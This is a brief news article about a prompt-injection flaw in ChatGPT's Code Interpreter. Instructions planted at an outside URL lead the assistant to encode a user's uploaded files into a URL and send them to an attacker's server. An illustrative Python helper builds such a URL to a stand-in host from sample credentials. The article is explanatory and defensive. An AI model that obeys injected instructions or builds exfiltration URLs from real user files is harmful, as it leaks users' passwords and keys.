

This is due to a major vulnerability in the Code Interpreter feature that was recently added to ChatGPT.

The vulnerability, first reported by security researcher Johann Rehberger and since confirmed experimentally, allows prompt injection attacks that can lead to data leaks.

The core of the problem is how the code interpreter handles files in its sandbox environment. Users can upload files for analysis or to generate charts, but this inadvertently opens the door to attackers.

By delivering instructions through a third-party URL, attackers can direct ChatGPT to encode uploaded files into a URL-friendly string and then send that data to a server they have prepared in advance.
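To make the encoding step concrete, here is a minimal Python sketch of how text from a file can be turned into a URL-friendly string and attached to a web address. It is an illustration under assumptions, not the exact payload from the research: the host `attacker.example`, the `data` parameter, and both function names are hypothetical, percent-encoding is assumed as the encoding, and nothing is actually sent over the network.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Hypothetical endpoint, used only for illustration; no request is made.
COLLECTOR_URL = "https://attacker.example/collect"


def build_exfil_url(file_text: str, base_url: str = COLLECTOR_URL) -> str:
    """Percent-encode file contents and append them as a query parameter."""
    # safe="" forces every reserved character (=, /, newline, space) to be escaped.
    encoded = quote(file_text, safe="")
    return f"{base_url}?data={encoded}"


def recover_payload(url: str) -> str:
    """Show what a receiving server could read back from the request URL."""
    return parse_qs(urlsplit(url).query)["data"][0]


# Made-up file contents standing in for an uploaded credentials file.
sample = "API_KEY=sk-test-123\npassword=hunter2"
url = build_exfil_url(sample)
print(url)
print(recover_payload(url) == sample)
```

The point of the sketch is that the secret never has to leave as a file: once it is part of a URL, a single web request is enough to deliver it, which is why links and pages from unknown sources are risky to hand to a tool that can also read uploaded files.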

As a result, the attacker can obtain confidential information contained in those files, such as passwords or API keys.

Source: Ferra
